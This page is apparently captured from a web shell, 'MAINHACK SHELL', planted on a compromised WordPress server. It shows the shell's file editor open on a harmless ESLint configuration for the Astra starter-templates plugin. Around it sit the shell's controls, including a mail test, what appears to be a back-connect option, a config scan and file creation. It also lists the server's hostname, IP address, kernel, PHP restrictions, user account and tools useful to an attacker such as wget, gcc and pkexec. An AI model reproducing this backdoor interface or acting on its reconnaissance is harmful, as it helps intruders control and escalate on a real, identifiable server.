[
MAINHACK SHELL
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: .eslintrc.js
module.exports = { extends: [ 'plugin:@wordpress/eslint-plugin/recommended-with-formatting' ], rules: { camelcase: 'off', 'import/no-unresolved': 'off', 'no-console': 'off', 'no-alert': 'off', 'jsx-a11y/click-events-have-key-events': 'off', 'jsx-a11y/label-has-for': 'off', 'jsx-a11y/no-static-element-interactions': 'off', 'jsx-a11y/anchor-is-valid': 'off', 'jsx-a11y/label-has-associated-control': 'off', 'jsx-a11y/no-onchange': 'off', '@wordpress/no-global-event-listener': 'off', 'space-before-function-paren': 'off', 'wrap-iife': 'off', 'react/jsx-indent-props': 'off', //Neet to fix below rule 'react-hooks/exhaustive-deps': 'off', 'no-mixed-spaces-and-tabs': 'off', 'no-mixed-operators': 'off', 'react/jsx-indent': 'off', 'jsdoc/valid-types': 'off', indent: 'off', '@wordpress/i18n-text-domain': [ 'error', { allowedTextDomain: 'astra-sites', }, ], }, overrides: [ { files: [ 'tests/e2e/**/*.js' ], extends: [ 'plugin:@wordpress/eslint-plugin/test-e2e', 'plugin:jest/all', ], settings: { jest: { version: 26, }, }, rules: { 'jest/prefer-lowercase-title': [ 'error', { ignore: [ 'describe' ], }, ], 'jest/no-hooks': 'off', 'jest/prefer-expect-assertions': 'off', 'jest/prefer-inline-snapshots': 'off', }, }, ], parserOptions: { requireConfigFile: false, babelOptions: { presets: [ '@wordpress/babel-preset-default' ], }, }, globals: { starterTemplates: true, astraSitesVars: true, ajaxurl: true, starterTemplatesPreview: true, jQuery: true, wpApiSettings: true, starter_templates_zip_preview: true, localStorage: true, sessionStorage: true, navigator: true, Image: true, requestAnimationFrame: true, EventSource: true, ResizeObserver: true, }, };
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server.isorus.org
Server IP: 159.223.142.74
PHP Version: 7.4.33
Server Software: Apache
System: Linux server.isorus.org 4.18.0-477.27.2.el8_8.x86_64 #1 SMP Fri Sep 29 08:21:01 EDT 2023 x86_64
HDD Total: 319.99 GB
HDD Free: 215.79 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
Off
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Disabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: inceptionblue
User ID (UID): 1042
Group ID (GID): 1043
Script Owner UID:
Current Dir Owner: 1042